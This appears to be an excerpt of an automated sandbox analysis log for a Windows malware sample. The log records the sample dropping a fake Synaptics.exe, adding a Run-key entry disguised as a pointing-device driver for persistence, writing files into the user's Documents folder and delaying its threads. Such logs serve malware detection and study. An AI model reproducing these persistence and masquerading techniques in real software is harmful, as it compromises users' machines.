Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Synaptics\Synaptics.exe	Section loaded: textshaping.dll	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\CRhqW9p.ini

Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Automated click: I agree to the license terms and conditions
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Window detected: Number of UI elements: 19

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: LisectAVT_2403002A_282.exe

Static file information: File size 16016392 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: LisectAVT_2403002A_282.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xe9bc00

Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\WixStdBA.pdbH source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmp, wixstdba.dll.2.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb source: LisectAVT_2403002A_282.exe, ._cache_LisectAVT_2403002A_282.exe.0.dr, Synaptics.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb`E source: LisectAVT_2403002A_282.exe, ._cache_LisectAVT_2403002A_282.exe.0.dr, Synaptics.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\WixStdBA.pdb source: ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3585039374.000000006C9D5000.00000002.00000001.01000000.00000007.sdmp, wixstdba.dll.2.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb` source: ._cache_LisectAVT_2403002A_282.exe, 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000001.00000000.1729235630.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000002.3581941102.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, ._cache_LisectAVT_2403002A_282.exe, 00000002.00000000.1731390957.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Code function: 1_2_00CBC27B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00CBC27B

Source: ._cache_LisectAVT_2403002A_282.exe.0.dr

Static PE information: section name: .wixburn

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CBA1F5 push ecx; ret		1_2_00CBA208
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 2_2_6C9CF135 push ecx; ret		2_2_6C9CF148

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File created: C:\ProgramData\Synaptics\RCX822C.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File created: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\wixstdba.dll	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File created: C:\ProgramData\Synaptics\RCX822C.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Jump to dropped file

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1028\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1029\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1031\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1036\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1040\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1041\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1042\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1045\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1046\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1049\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\1055\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\2052\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\3082\license.rtf	Jump to behavior
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	File created: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\license.rtf	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_282.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\wixstdba.dll

Jump to dropped file

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1804

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CBF805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00CBF8A6h		1_2_00CBF805
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CBF805 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00CBF89Fh		1_2_00CBF805

Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CC5D81 _memset,FindFirstFileW,FindClose,	1_2_00CC5D81
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CC6D15 _memset,_memset,GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,	1_2_00CC6D15
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 1_2_00CA8E6E _memset,FindFirstFileW,lstrlenW,FindNextFileW,FindClose,	1_2_00CA8E6E
Source: C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe	Code function: 2_2_6C9CA815 _memset,FindFirstFileW,FindClose,	2_2_6C9CA815

Source: C:\ProgramData\Synaptics\Synaptics.exe	Thread delayed: delay time: 60000			Jump to behavior
